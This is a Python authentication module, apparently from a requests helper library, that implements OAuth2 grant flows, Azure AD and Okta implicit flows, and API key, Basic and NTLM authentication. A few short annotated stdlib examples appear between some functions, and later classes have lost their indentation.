    for parameter_name in extra_parameters.keys():
        # TODO Handle parameters with a list as a value and submit PR to requests or Python
        query_params[parameter_name] = [extra_parameters[parameter_name]]

    new_query_string = urlencode(query_params, doseq=True)

    return urlunsplit((scheme, netloc, path, new_query_string, fragment))
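The merge `_add_parameters` performs can be seen end to end with the stdlib alone; existing query parameters survive and the extras are appended (the URL and parameter values below are illustrative):

```python
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

url = 'https://provider.example/authorize?response_type=code'
extra = {'client_id': 'my-app', 'state': 'xyz'}

scheme, netloc, path, query_string, fragment = urlsplit(url)
params = parse_qs(query_string)       # {'response_type': ['code']}
for name, value in extra.items():
    params[name] = [value]            # parse_qs values are lists
new_url = urlunsplit((scheme, netloc, path, urlencode(params, doseq=True), fragment))
```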
def _pop_parameter(url, query_parameter_name):
    """
    Remove and return parameter of an URL.

    :param url: The URL containing (or not) the parameter.
    :param query_parameter_name: The query parameter to pop.
    :return: The new URL (without this parameter) and the parameter value (None if not found).
    """
    scheme, netloc, path, query_string, fragment = urlsplit(url)
    query_params = parse_qs(query_string)
    parameter_value = query_params.pop(query_parameter_name, None)
    new_query_string = urlencode(query_params, doseq=True)

    return urlunsplit((scheme, netloc, path, new_query_string, fragment)), parameter_value
def _get_query_parameter(url, param_name):
    scheme, netloc, path, query_string, fragment = urlsplit(url)
    query_params = parse_qs(query_string)
    all_values = query_params.get(param_name)
    return all_values[0] if all_values else None
def request_new_grant_with_post(url, data, grant_name, timeout, auth=None):
    response = requests.post(url, data=data, timeout=timeout, auth=auth)
    response.raise_for_status()

    content = response.json()
    token = content.get(grant_name)
    if not token:
        raise GrantNotProvided(grant_name, content)
    return token, content.get('expires_in')
class OAuth2:
    token_cache = oauth2_tokens.TokenMemoryCache()
class OAuth2ResourceOwnerPasswordCredentials(requests.auth.AuthBase):
    """
    Resource Owner Password Credentials Grant

    Describes an OAuth 2 resource owner password credentials (also called password) flow requests authentication.
    More details can be found in https://tools.ietf.org/html/rfc6749#section-4.3
    """

    def __init__(self, token_url, username, password, **kwargs):
        """
        :param token_url: OAuth 2 token URL.
        :param username: Resource owner user name.
        :param password: Resource owner password.
        :param timeout: Maximum amount of seconds to wait for a token to be received once requested.
            Wait for 1 minute by default.
        :param header_name: Name of the header field used to send token.
            Token will be sent in Authorization header field by default.
        :param header_value: Format used to send the token value.
            "{token}" must be present as it will be replaced by the actual token.
            Token will be sent as "Bearer {token}" by default.
        :param scope: Scope parameter sent to token URL as body. Can also be a list of scopes. Not sent by default.
        :param token_field_name: Field name containing the token. access_token by default.
        :param kwargs: all additional authorization parameters that should be put as body parameters in the token URL.
        """
        self.token_url = token_url
        if not self.token_url:
            raise Exception('Token URL is mandatory.')
        self.username = username
        if not self.username:
            raise Exception('User name is mandatory.')
        self.password = password
        if not self.password:
            raise Exception('Password is mandatory.')
        self.kwargs = kwargs

        extra_parameters = dict(kwargs)
        self.header_name = extra_parameters.pop('header_name', None) or 'Authorization'
        self.header_value = extra_parameters.pop('header_value', None) or 'Bearer {token}'
        if '{token}' not in self.header_value:
            raise Exception('header_value parameter must contain {token}.')

        self.token_field_name = extra_parameters.pop('token_field_name', None) or 'access_token'

        # Time is expressed in seconds
        self.timeout = int(extra_parameters.pop('timeout', None) or 60)

        # As described in https://tools.ietf.org/html/rfc6749#section-4.3.2
        self.data = {
            'grant_type': 'password',
            'username': self.username,
            'password': self.password,
        }
        scope = extra_parameters.pop('scope', None)
        if scope:
            self.data['scope'] = ' '.join(scope) if isinstance(scope, list) else scope
        self.data.update(extra_parameters)

        all_parameters_in_url = _add_parameters(self.token_url, self.data)
        self.state = sha512(all_parameters_in_url.encode('unicode_escape')).hexdigest()

    def __call__(self, r):
        token = OAuth2.token_cache.get_token(self.state, self.request_new_token)
        r.headers[self.header_name] = self.header_value.format(token=token)
        return r

    def request_new_token(self):
        # As described in https://tools.ietf.org/html/rfc6749#section-4.3.3
        token, expires_in = request_new_grant_with_post(
            self.token_url, self.data, self.token_field_name, self.timeout,
            auth=(self.username, self.password)
        )
        # Handle both Access and Bearer tokens
        return (self.state, token, expires_in) if expires_in else (self.state, token)

    def __add__(self, other):
        if isinstance(other, Auths):
            return Auths(self, *other.authentication_modes)
        return Auths(self, other)

    def __str__(self):
        addition_args_str = ', '.join(["{0}='{1}'".format(key, value) for key, value in self.kwargs.items()])
        return "OAuth2ResourceOwnerPasswordCredentials('{0}', '{1}', '{2}', {3})".format(
            self.token_url, self.username, self.password, addition_args_str
        )
class OAuth2ClientCredentials(requests.auth.AuthBase):
    """
    Client Credentials Grant

    Describes an OAuth 2 client credentials (also called application) flow requests authentication.
    More details can be found in https://tools.ietf.org/html/rfc6749#section-4.4
    """

    def __init__(self, token_url, username, password, **kwargs):
        """
        :param token_url: OAuth 2 token URL.
        :param username: Resource owner user name.
        :param password: Resource owner password.
        :param timeout: Maximum amount of seconds to wait for a token to be received once requested.
            Wait for 1 minute by default.
        :param header_name: Name of the header field used to send token.
            Token will be sent in Authorization header field by default.
        :param header_value: Format used to send the token value.
            "{token}" must be present as it will be replaced by the actual token.
            Token will be sent as "Bearer {token}" by default.
        :param scope: Scope parameter sent to token URL as body. Can also be a list of scopes. Not sent by default.
        :param token_field_name: Field name containing the token. access_token by default.
        :param kwargs: all additional authorization parameters that should be put as query parameter in the token URL.
        """
        self.token_url = token_url
        if not self.token_url:
            raise Exception('Token URL is mandatory.')
        self.username = username
        if not self.username:
            raise Exception('User name is mandatory.')
        self.password = password
        if not self.password:
            raise Exception('Password is mandatory.')
        self.kwargs = kwargs

        extra_parameters = dict(kwargs)
        self.header_name = extra_parameters.pop('header_name', None) or 'Authorization'
        self.header_value = extra_parameters.pop('header_value', None) or 'Bearer {token}'
        if '{token}' not in self.header_value:
            raise Exception('header_value parameter must contain {token}.')

        self.token_field_name = extra_parameters.pop('token_field_name', None) or 'access_token'

        # Time is expressed in seconds
        self.timeout = int(extra_parameters.pop('timeout', None) or 60)

        # As described in https://tools.ietf.org/html/rfc6749#section-4.4.2
        self.data = {
            'grant_type': 'client_credentials',
        }
        scope = extra_parameters.pop('scope', None)
        if scope:
            self.data['scope'] = ' '.join(scope) if isinstance(scope, list) else scope
        self.data.update(extra_parameters)

        all_parameters_in_url = _add_parameters(self.token_url, self.data)
        self.state = sha512(all_parameters_in_url.encode('unicode_escape')).hexdigest()

    def __call__(self, r):
        token = OAuth2.token_cache.get_token(self.state, self.request_new_token)
        r.headers[self.header_name] = self.header_value.format(token=token)
        return r

    def request_new_token(self):
        # As described in https://tools.ietf.org/html/rfc6749#section-4.4.3
        token, expires_in = request_new_grant_with_post(
            self.token_url, self.data, self.token_field_name, self.timeout,
            auth=(self.username, self.password)
        )
        # Handle both Access and Bearer tokens
        return (self.state, token, expires_in) if expires_in else (self.state, token)

    def __add__(self, other):
        if isinstance(other, Auths):
            return Auths(self, *other.authentication_modes)
        return Auths(self, other)

    def __str__(self):
        addition_args_str = ', '.join(["{0}='{1}'".format(key, value) for key, value in self.kwargs.items()])
        return "OAuth2ClientCredentials('{0}', '{1}', '{2}', {3})".format(
            self.token_url, self.username, self.password, addition_args_str
        )
class OAuth2AuthorizationCode(requests.auth.AuthBase):
    """
    Authorization Code Grant

    Describes an OAuth 2 authorization code (also called access code) flow requests authentication.

    Request a code with client browser, then request a token using this code.
    Store the token and use it for subsequent valid requests.

    More details can be found in https://tools.ietf.org/html/rfc6749#section-4.1
    """

    def __init__(self, authorization_url, token_url, **kwargs):
        """
        :param authorization_url: OAuth 2 authorization URL.
        :param token_url: OAuth 2 token URL.
        :param redirect_uri_endpoint: Custom endpoint that will be used as redirect_uri the following way:
            http://localhost:<redirect_uri_port>/<redirect_uri_endpoint>. Default value is to redirect on / (root).
        :param redirect_uri_port: The port on which the server listening for the OAuth 2 code will be started.
            Listen on port 5000 by default.
        :param timeout: Maximum amount of seconds to wait for a code or a token to be received once requested.
            Wait for 1 minute by default.
        :param success_display_time: In case a code is successfully received,
            this is the maximum amount of milliseconds the success page will be displayed in your browser.
            Display the page for 1 millisecond by default.
        :param failure_display_time: In case received code is not valid,
            this is the maximum amount of milliseconds the failure page will be displayed in your browser.
            Display the page for 5 seconds by default.
        :param header_name: Name of the header field used to send token.
            Token will be sent in Authorization header field by default.
        :param header_value: Format used to send the token value.
            "{token}" must be present as it will be replaced by the actual token.
            Token will be sent as "Bearer {token}" by default.
        :param response_type: Value of the response_type query parameter if not already provided in authorization URL.
            code by default.
        :param token_field_name: Field name containing the token. access_token by default.
        :param code_field_name: Field name containing the code. code by default.
        :param username: User name in case basic authentication should be used to retrieve token.
        :param password: User password in case basic authentication should be used to retrieve token.
        :param kwargs: all additional authorization parameters that should be put as query parameter
            in the authorization URL and as body parameters in the token URL.
            Usual parameters are:
            * client_id: Corresponding to your Application ID (in Microsoft Azure app portal)
            * client_secret: If client is not authenticated with the authorization server
            * nonce: Refer to http://openid.net/specs/openid-connect-core-1_0.html#IDToken for more details
        """
        self.authorization_url = authorization_url
        if not self.authorization_url:
            raise Exception('Authorization URL is mandatory.')
        self.token_url = token_url
        if not self.token_url:
            raise Exception('Token URL is mandatory.')
        self.kwargs = kwargs

        extra_parameters = dict(kwargs)
        self.header_name = extra_parameters.pop('header_name', None) or 'Authorization'
        self.header_value = extra_parameters.pop('header_value', None) or 'Bearer {token}'
        if '{token}' not in self.header_value:
            raise Exception('header_value parameter must contain {token}.')

        redirect_uri_endpoint = extra_parameters.pop('redirect_uri_endpoint', None) or ''
        redirect_uri_port = int(extra_parameters.pop('redirect_uri_port', None) or 5000)
        self.token_field_name = extra_parameters.pop('token_field_name', None) or 'access_token'

        # Time is expressed in seconds
        self.timeout = int(extra_parameters.pop('timeout', None) or 60)
        # Time is expressed in milliseconds
        success_display_time = int(extra_parameters.pop('success_display_time', None) or 1)
        # Time is expressed in milliseconds
        failure_display_time = int(extra_parameters.pop('failure_display_time', None) or 5000)

        username = extra_parameters.pop('username', None)
        password = extra_parameters.pop('password', None)
        self.auth = (username, password) if username and password else None

        # As described in https://tools.ietf.org/html/rfc6749#section-4.1.2
        code_field_name = extra_parameters.pop('code_field_name', 'code')
        if _get_query_parameter(self.authorization_url, 'response_type'):
            extra_parameters.pop('response_type', None)  # Ensure provided value will not be overridden
        else:
            # As described in https://tools.ietf.org/html/rfc6749#section-4.1.1
            extra_parameters.setdefault('response_type', 'code')

        redirect_uri = 'http://localhost:{0}/{1}'.format(redirect_uri_port, redirect_uri_endpoint)
        authorization_url_without_nonce = _add_parameters(self.authorization_url, extra_parameters)
        authorization_url_without_nonce, nonce = _pop_parameter(authorization_url_without_nonce, 'nonce')
        self.state = sha512(authorization_url_without_nonce.encode('unicode_escape')).hexdigest()
        custom_code_parameters = {'state': self.state, 'redirect_uri': redirect_uri}
        if nonce:
            custom_code_parameters['nonce'] = nonce
        code_grant_url = _add_parameters(authorization_url_without_nonce, custom_code_parameters)
        self.code_grant_details = oauth2_authentication_responses_server.GrantDetails(
            code_grant_url,
            code_field_name,
            self.timeout,
            success_display_time,
            failure_display_time,
            redirect_uri_port
        )

        # As described in https://tools.ietf.org/html/rfc6749#section-4.1.3
        self.token_data = {
            'grant_type': 'authorization_code',
            'redirect_uri': redirect_uri,
        }
        self.token_data.update(extra_parameters)

    def __call__(self, r):
        token = OAuth2.token_cache.get_token(self.state, self.request_new_token)
        r.headers[self.header_name] = self.header_value.format(token=token)
        return r

    def request_new_token(self):
        # Request code
        state, code = oauth2_authentication_responses_server.request_new_grant(self.code_grant_details)

        # As described in https://tools.ietf.org/html/rfc6749#section-4.1.3
        self.token_data['code'] = code
        # As described in https://tools.ietf.org/html/rfc6749#section-4.1.4
        token, expires_in = request_new_grant_with_post(
            self.token_url, self.token_data, self.token_field_name, self.timeout, auth=self.auth
        )
        # Handle both Access and Bearer tokens
        return (self.state, token, expires_in) if expires_in else (self.state, token)

    def __add__(self, other):
        if isinstance(other, Auths):
            return Auths(self, *other.authentication_modes)
        return Auths(self, other)

    def __str__(self):
        addition_args_str = ', '.join(["{0}='{1}'".format(key, value) for key, value in self.kwargs.items()])
        return "OAuth2AuthorizationCode('{0}', '{1}', {2})".format(
            self.authorization_url, self.token_url, addition_args_str
        )
class OAuth2Implicit(requests.auth.AuthBase):
"""
Implicit Grant
Describes an OAuth 2 implicit flow requests authentication.
Request a token with client browser.
Store the token and use it for subsequent valid requests.
More details can be found in https://tools.ietf.org/html/rfc6749#section-4.2
"""
def __init__(self, authorization_url, **kwargs):
"""
:param authorization_url: OAuth 2 authorization URL.
:param response_type: Value of the response_type query parameter if not already provided in authorization URL.
token by default.
:param token_field_name: Name of the expected field containing the token.
id_token by default if response_type is id_token, else access_token.
:param redirect_uri_endpoint: Custom endpoint that will be used as redirect_uri the following way:
http://localhost:<redirect_uri_port>/<redirect_uri_endpoint>. Default value is to redirect on / (root).
:param redirect_uri_port: The port on which the server listening for the OAuth 2 token will be started.
Listen on port 5000 by default.
:param timeout: Maximum amount of seconds to wait for a token to be received once requested.
Wait for 1 minute by default.
:param success_display_time: In case a token is successfully received,
this is the maximum amount of milliseconds the success page will be displayed in your browser.
Display the page for 1 millisecond by default.
:param failure_display_time: In case received token is not valid,
this is the maximum amount of milliseconds the failure page will be displayed in your browser.
Display the page for 5 seconds by default.
:param header_name: Name of the header field used to send token.
Token will be sent in Authorization header field by default.
:param header_value: Format used to send the token value.
"{token}" must be present as it will be replaced by the actual token.
Token will be sent as "Bearer {token}" by default.
:param kwargs: all additional authorization parameters that should be put as query parameter
in the authorization URL.
Usual parameters are:
* client_id: Corresponding to your Application ID (in Microsoft Azure app portal)
* nonce: Refer to http://openid.net/specs/openid-connect-core-1_0.html#IDToken for more details
* prompt: none to avoid prompting the user if a session is already opened.
"""
self.authorization_url = authorization_url
if not self.authorization_url:
raise Exception('Authorization URL is mandatory.')
self.kwargs = kwargs
extra_parameters = dict(kwargs)
self.header_name = extra_parameters.pop('header_name', None) or 'Authorization'
self.header_value = extra_parameters.pop('header_value', None) or 'Bearer {token}'
if '{token}' not in self.header_value:
raise Exception('header_value parameter must contain {token}.')
redirect_uri_endpoint = extra_parameters.pop('redirect_uri_endpoint', None) or ''
redirect_uri_port = int(extra_parameters.pop('redirect_uri_port', None) or 5000)
# Time is expressed in seconds
timeout = int(extra_parameters.pop('timeout', None) or 60)
# Time is expressed in milliseconds
success_display_time = int(extra_parameters.pop('success_display_time', None) or 1)
# Time is expressed in milliseconds
failure_display_time = int(extra_parameters.pop('failure_display_time', None) or 5000)
response_type = _get_query_parameter(self.authorization_url, 'response_type')
if response_type:
extra_parameters.pop('response_type', None) # Ensure provided value will not be overridden
else:
# As described in https://tools.ietf.org/html/rfc6749#section-4.2.1
response_type = extra_parameters.setdefault('response_type', 'token')
# As described in https://tools.ietf.org/html/rfc6749#section-4.2.2
token_field_name = extra_parameters.pop('token_field_name', None)
if not token_field_name:
token_field_name = 'id_token' if 'id_token' == response_type else 'access_token'
redirect_uri = 'http://localhost:{0}/{1}'.format(redirect_uri_port, redirect_uri_endpoint)
authorization_url_without_nonce = _add_parameters(self.authorization_url, extra_parameters)
authorization_url_without_nonce, nonce = _pop_parameter(authorization_url_without_nonce, 'nonce')
self.state = sha512(authorization_url_without_nonce.encode('unicode_escape')).hexdigest()
custom_parameters = {'state': self.state, 'redirect_uri': redirect_uri}
if nonce:
custom_parameters['nonce'] = nonce
grant_url = _add_parameters(authorization_url_without_nonce, custom_parameters)
self.grant_details = oauth2_authentication_responses_server.GrantDetails(
grant_url,
token_field_name,
timeout,
success_display_time,
failure_display_time,
redirect_uri_port
)
def __call__(self, r):
token = OAuth2.token_cache.get_token(
self.state, oauth2_authentication_responses_server.request_new_grant, self.grant_details
)
r.headers[self.header_name] = self.header_value.format(token=token)
return r
def __add__(self, other):
if isinstance(other, Auths):
return Auths(self, *other.authentication_modes)
return Auths(self, other)
def __str__(self):
addition_args_str = ', '.join(["{0}='{1}'".format(key, value) for key, value in self.kwargs.items()])
return "OAuth2Implicit('{0}', {1})".format(self.authorization_url, addition_args_str)
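The implicit flow above identifies each pending grant by a `state` derived from the authorization URL (minus the nonce). A minimal stdlib-only sketch of that derivation — `make_state` is a hypothetical helper mirroring the `sha512` call in `__init__`, not part of the library:

```python
from hashlib import sha512

def make_state(authorization_url_without_nonce: str) -> str:
    # Mirror of: sha512(url.encode('unicode_escape')).hexdigest()
    return sha512(authorization_url_without_nonce.encode("unicode_escape")).hexdigest()

state = make_state("https://provider.test/authorize?client_id=abc&response_type=token")
print(len(state))  # a SHA-512 hex digest is always 128 characters
```

Because the state is a deterministic hash of the (nonce-free) grant URL, repeated requests for the same grant hit the same token-cache entry.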
class AzureActiveDirectoryImplicit(OAuth2Implicit):
"""
Describes an Azure Active Directory (OAuth 2) "Access Token" requests authentication.
https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens
"""
def __init__(self, tenant_id, client_id, **kwargs):
"""
:param tenant_id: Microsoft Tenant Identifier (formatted as a Universally Unique Identifier)
:param client_id: Microsoft Application Identifier (formatted as a Universally Unique Identifier)
:param response_type: Value of the response_type query parameter.
token by default.
:param token_field_name: Name of the expected field containing the token.
access_token by default.
:param nonce: Refer to http://openid.net/specs/openid-connect-core-1_0.html#IDToken for more details
(formatted as a Universally Unique Identifier - UUID). Use a newly generated UUID by default.
:param redirect_uri_endpoint: Custom endpoint that will be used as redirect_uri the following way:
http://localhost:<redirect_uri_port>/<redirect_uri_endpoint>. Default value is to redirect on / (root).
:param redirect_uri_port: The port on which the server listening for the OAuth 2 token will be started.
Listen on port 5000 by default.
:param timeout: Maximum amount of seconds to wait for a token to be received once requested.
Wait for 1 minute by default.
:param success_display_time: In case a token is successfully received,
this is the maximum amount of milliseconds the success page will be displayed in your browser.
Display the page for 1 millisecond by default.
:param failure_display_time: In case the received token is not valid,
this is the maximum amount of milliseconds the failure page will be displayed in your browser.
Display the page for 5 seconds by default.
:param header_name: Name of the header field used to send token.
Token will be sent in Authorization header field by default.
:param header_value: Format used to send the token value.
"{token}" must be present as it will be replaced by the actual token.
Token will be sent as "Bearer {token}" by default.
:param kwargs: all additional authorization parameters that should be put as query parameter
in the authorization URL.
Usual parameters are:
* prompt: none to avoid prompting the user if a session is already opened.
"""
OAuth2Implicit.__init__(
self,
'https://login.microsoftonline.com/{0}/oauth2/authorize'.format(tenant_id),
client_id=client_id,
nonce=kwargs.pop('nonce', None) or str(uuid.uuid4()),
**kwargs
)
class AzureActiveDirectoryImplicitIdToken(OAuth2Implicit):
"""
Describes an Azure Active Directory (OpenID Connect) "ID Token" requests authentication.
https://docs.microsoft.com/en-us/azure/active-directory/develop/id-tokens
"""
def __init__(self, tenant_id, client_id, **kwargs):
"""
:param tenant_id: Microsoft Tenant Identifier (formatted as a Universally Unique Identifier)
:param client_id: Microsoft Application Identifier (formatted as a Universally Unique Identifier)
:param response_type: Value of the response_type query parameter.
id_token by default.
:param token_field_name: Name of the expected field containing the token.
id_token by default.
:param nonce: Refer to http://openid.net/specs/openid-connect-core-1_0.html#IDToken for more details
(formatted as a Universally Unique Identifier - UUID). Use a newly generated UUID by default.
:param redirect_uri_endpoint: Custom endpoint that will be used as redirect_uri the following way:
http://localhost:<redirect_uri_port>/<redirect_uri_endpoint>. Default value is to redirect on / (root).
:param redirect_uri_port: The port on which the server listening for the OAuth 2 token will be started.
Listen on port 5000 by default.
:param timeout: Maximum amount of seconds to wait for a token to be received once requested.
Wait for 1 minute by default.
:param success_display_time: In case a token is successfully received,
this is the maximum amount of milliseconds the success page will be displayed in your browser.
Display the page for 1 millisecond by default.
:param failure_display_time: In case the received token is not valid,
this is the maximum amount of milliseconds the failure page will be displayed in your browser.
Display the page for 5 seconds by default.
:param header_name: Name of the header field used to send token.
Token will be sent in Authorization header field by default.
:param header_value: Format used to send the token value.
"{token}" must be present as it will be replaced by the actual token.
Token will be sent as "Bearer {token}" by default.
:param kwargs: all additional authorization parameters that should be put as query parameter
in the authorization URL.
Usual parameters are:
* prompt: none to avoid prompting the user if a session is already opened.
"""
OAuth2Implicit.__init__(
self,
'https://login.microsoftonline.com/{0}/oauth2/authorize'.format(tenant_id),
client_id=client_id,
response_type=kwargs.pop('response_type', 'id_token'),
token_field_name=kwargs.pop('token_field_name', 'id_token'),
nonce=kwargs.pop('nonce', None) or str(uuid.uuid4()),
**kwargs
)
class OktaImplicit(OAuth2Implicit):
"""
Describes an OKTA (OAuth 2) "Access Token" implicit flow requests authentication.
"""
def __init__(self, instance, client_id, **kwargs):
"""
:param instance: OKTA instance (like "testserver.okta-emea.com")
:param client_id: Okta Application Identifier (the client ID of your Okta application)
:param response_type: Value of the response_type query parameter.
token by default.
:param token_field_name: Name of the expected field containing the token.
access_token by default.
:param nonce: Refer to http://openid.net/specs/openid-connect-core-1_0.html#IDToken for more details
(formatted as a Universally Unique Identifier - UUID). Use a newly generated UUID by default.
:param authorization_server: OKTA authorization server
:param scope: Scope parameter sent in query. Can also be a list of scopes.
Request ['openid', 'profile', 'email'] by default.
:param redirect_uri_endpoint: Custom endpoint that will be used as redirect_uri the following way:
http://localhost:<redirect_uri_port>/<redirect_uri_endpoint>. Default value is to redirect on / (root).
:param redirect_uri_port: The port on which the server listening for the OAuth 2 token will be started.
Listen on port 5000 by default.
:param timeout: Maximum amount of seconds to wait for a token to be received once requested.
Wait for 1 minute by default.
:param success_display_time: In case a token is successfully received,
this is the maximum amount of milliseconds the success page will be displayed in your browser.
Display the page for 1 millisecond by default.
:param failure_display_time: In case the received token is not valid,
this is the maximum amount of milliseconds the failure page will be displayed in your browser.
Display the page for 5 seconds by default.
:param header_name: Name of the header field used to send token.
Token will be sent in Authorization header field by default.
:param header_value: Format used to send the token value.
"{token}" must be present as it will be replaced by the actual token.
Token will be sent as "Bearer {token}" by default.
:param kwargs: all additional authorization parameters that should be put as query parameter
in the authorization URL.
Usual parameters are:
* prompt: none to avoid prompting the user if a session is already opened.
"""
authorization_server = kwargs.pop('authorization_server', None)
scopes = kwargs.pop('scope', None) or ['openid', 'profile', 'email']
kwargs['scope'] = ' '.join(scopes) if isinstance(scopes, list) else scopes
OAuth2Implicit.__init__(
self,
'https://{okta_instance}/oauth2{okta_auth_server}/v1/authorize'.format(
okta_instance=instance,
okta_auth_server="/" + authorization_server if authorization_server else ""
),
client_id=client_id,
nonce=kwargs.pop('nonce', None) or str(uuid.uuid4()),
**kwargs
)
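The Okta classes assemble the authorize endpoint from the instance and an optional authorization server, and join list scopes with spaces. A small standalone sketch of that URL/scope handling — `okta_authorize_url` and `join_scopes` are illustrative helpers, not part of the library:

```python
def okta_authorize_url(instance: str, authorization_server: str = None) -> str:
    # The "/<server>" path segment appears only when a custom authorization server is given.
    server = "/" + authorization_server if authorization_server else ""
    return "https://{0}/oauth2{1}/v1/authorize".format(instance, server)

def join_scopes(scope):
    # Lists become a single space-separated scope string, as in OktaImplicit.__init__.
    return " ".join(scope) if isinstance(scope, list) else scope

print(okta_authorize_url("testserver.okta-emea.com"))
# → https://testserver.okta-emea.com/oauth2/v1/authorize
print(okta_authorize_url("testserver.okta-emea.com", "default"))
# → https://testserver.okta-emea.com/oauth2/default/v1/authorize
print(join_scopes(["openid", "profile", "email"]))
# → openid profile email
```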
class OktaImplicitIdToken(OAuth2Implicit):
"""
Describes an OKTA (OpenID Connect) "ID Token" implicit flow requests authentication.
"""
def __init__(self, instance, client_id, **kwargs):
"""
:param instance: OKTA instance (like "testserver.okta-emea.com")
:param client_id: Okta Application Identifier (the client ID of your Okta application)
:param response_type: Value of the response_type query parameter.
id_token by default.
:param token_field_name: Name of the expected field containing the token.
id_token by default.
:param nonce: Refer to http://openid.net/specs/openid-connect-core-1_0.html#IDToken for more details
(formatted as a Universally Unique Identifier - UUID). Use a newly generated UUID by default.
:param authorization_server: OKTA authorization server
:param scope: Scope parameter sent in query. Can also be a list of scopes.
Request ['openid', 'profile', 'email'] by default.
:param redirect_uri_endpoint: Custom endpoint that will be used as redirect_uri the following way:
http://localhost:<redirect_uri_port>/<redirect_uri_endpoint>. Default value is to redirect on / (root).
:param redirect_uri_port: The port on which the server listening for the OAuth 2 token will be started.
Listen on port 5000 by default.
:param timeout: Maximum amount of seconds to wait for a token to be received once requested.
Wait for 1 minute by default.
:param success_display_time: In case a token is successfully received,
this is the maximum amount of milliseconds the success page will be displayed in your browser.
Display the page for 1 millisecond by default.
:param failure_display_time: In case the received token is not valid,
this is the maximum amount of milliseconds the failure page will be displayed in your browser.
Display the page for 5 seconds by default.
:param header_name: Name of the header field used to send token.
Token will be sent in Authorization header field by default.
:param header_value: Format used to send the token value.
"{token}" must be present as it will be replaced by the actual token.
Token will be sent as "Bearer {token}" by default.
:param kwargs: all additional authorization parameters that should be put as query parameter
in the authorization URL.
Usual parameters are:
* prompt: none to avoid prompting the user if a session is already opened.
"""
authorization_server = kwargs.pop('authorization_server', None)
scopes = kwargs.pop('scope', None) or ['openid', 'profile', 'email']
kwargs['scope'] = ' '.join(scopes) if isinstance(scopes, list) else scopes
OAuth2Implicit.__init__(
self,
'https://{okta_instance}/oauth2{okta_auth_server}/v1/authorize'.format(
okta_instance=instance,
okta_auth_server="/" + authorization_server if authorization_server else ""
),
client_id=client_id,
response_type=kwargs.pop('response_type', 'id_token'),
token_field_name=kwargs.pop('token_field_name', 'id_token'),
nonce=kwargs.pop('nonce', None) or str(uuid.uuid4()),
**kwargs
)
class HeaderApiKey(requests.auth.AuthBase):
"""Describes an API Key (sent in a header field) requests authentication."""
def __init__(self, api_key, header_name=None):
"""
:param api_key: The API key that will be sent.
:param header_name: Name of the header field. "X-API-Key" by default.
"""
self.api_key = api_key
if not api_key:
raise Exception('API Key is mandatory.')
self.header_name = header_name or 'X-API-Key'
def __call__(self, r):
r.headers[self.header_name] = self.api_key
return r
def __add__(self, other):
if isinstance(other, Auths):
return Auths(self, *other.authentication_modes)
return Auths(self, other)
def __str__(self):
return "HeaderApiKey('{0}', '{1}')".format(self.api_key, self.header_name)
class QueryApiKey(requests.auth.AuthBase):
"""Describes an API Key (sent as a query parameter) requests authentication."""
def __init__(self, api_key, query_parameter_name=None):
"""
:param api_key: The API key that will be sent.
:param query_parameter_name: Name of the query parameter. "api_key" by default.
"""
self.api_key = api_key
if not api_key:
raise Exception('API Key is mandatory.')
self.query_parameter_name = query_parameter_name or 'api_key'
def __call__(self, r):
r.url = _add_parameters(r.url, {self.query_parameter_name: self.api_key})
return r
def __add__(self, other):
if isinstance(other, Auths):
return Auths(self, *other.authentication_modes)
return Auths(self, other)
def __str__(self):
return "QueryApiKey('{0}', '{1}')".format(self.api_key, self.query_parameter_name)
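`QueryApiKey.__call__` relies on an `_add_parameters` helper (defined elsewhere in this module) to merge the key into the request URL. A rough stdlib-only equivalent, shown here only to illustrate the intended behaviour, not the library's actual implementation:

```python
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

def add_parameters(url: str, extra: dict) -> str:
    # Parse the existing query string, merge in the new parameters, rebuild the URL.
    scheme, netloc, path, query, fragment = urlsplit(url)
    params = dict(parse_qsl(query))
    params.update(extra)
    return urlunsplit((scheme, netloc, path, urlencode(params), fragment))

print(add_parameters("https://api.test/items?page=2", {"api_key": "secret"}))
# → https://api.test/items?page=2&api_key=secret
```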
class Basic(requests.auth.HTTPBasicAuth):
"""Describes a basic requests authentication."""
def __init__(self, username, password):
requests.auth.HTTPBasicAuth.__init__(self, username, password)
def __add__(self, other):
if isinstance(other, Auths):
return Auths(self, *other.authentication_modes)
return Auths(self, other)
def __str__(self):
return "Basic('{0}', '{1}')".format(self.username, self.password)
class NTLM:
"""Describes an NTLM requests authentication."""
def __init__(self, username=None, password=None):
"""
:param username: Mandatory if requests_negotiate_sspi module is not installed.
:param password: Mandatory if requests_negotiate_sspi module is not installed.
"""
self.username = username
self.password = password
if not username and not password:
try:
import requests_negotiate_sspi
self.auth = requests_negotiate_sspi.HttpNegotiateAuth()
except ImportError:
raise Exception('NTLM authentication requires requests_negotiate_sspi module.')
else:
if not username:
raise Exception('NTLM authentication requires "username" to be provided in security_details.')
if not password:
raise Exception('NTLM authentication requires "password" to be provided in security_details.')
try:
import requests_ntlm
self.auth = requests_ntlm.HttpNtlmAuth(username, password)
except ImportError:
raise Exception('NTLM authentication requires requests_ntlm module.')
def __call__(self, r):
self.auth.__call__(r)
return r
def __add__(self, other):
if isinstance(other, Auths):
return Auths(self, *other.authentication_modes)
return Auths(self, other)
def __str__(self):
if self.username and self.password:
return "NTLM('{0}', '{1}')".format(self.username, self.password)
return "NTLM()"
class Auths(requests.auth.AuthBase):
"""Authentication using multiple authentication methods."""
def __init__(self, *authentication_modes):
warnings.warn("Auths class will be removed in the future. Use + instead.", DeprecationWarning)
self.authentication_modes = authentication_modes
def __call__(self, r):
for authentication_mode in self.authentication_modes:
authentication_mode.__call__(r)
return r
def __add__(self, other):
if isinstance(other, Auths):
return Auths(*self.authentication_modes, *other.authentication_modes)
return Auths(*self.authentication_modes, other)
def __str__(self):
return "Auths(" + ", ".join(map(str, self.authentication_modes)) + ")"
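`Auths` simply invokes each authentication mode in turn on the same request, which is also what the `+` operator on the individual classes builds. The composition can be sketched with plain callables and a dummy request object (all names below are illustrative, not from the library):

```python
class DummyRequest:
    def __init__(self):
        self.headers = {}

def api_key_auth(r):
    r.headers["X-API-Key"] = "my-key"
    return r

def bearer_auth(r):
    r.headers["Authorization"] = "Bearer my-token"
    return r

def combine(*modes):
    # Equivalent of Auths.__call__: apply every mode to the request, in order.
    def combined(r):
        for mode in modes:
            mode(r)
        return r
    return combined

request = combine(api_key_auth, bearer_auth)(DummyRequest())
print(sorted(request.headers))  # → ['Authorization', 'X-API-Key']
```

Because each mode mutates the request in place, later modes win if two of them write the same header.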
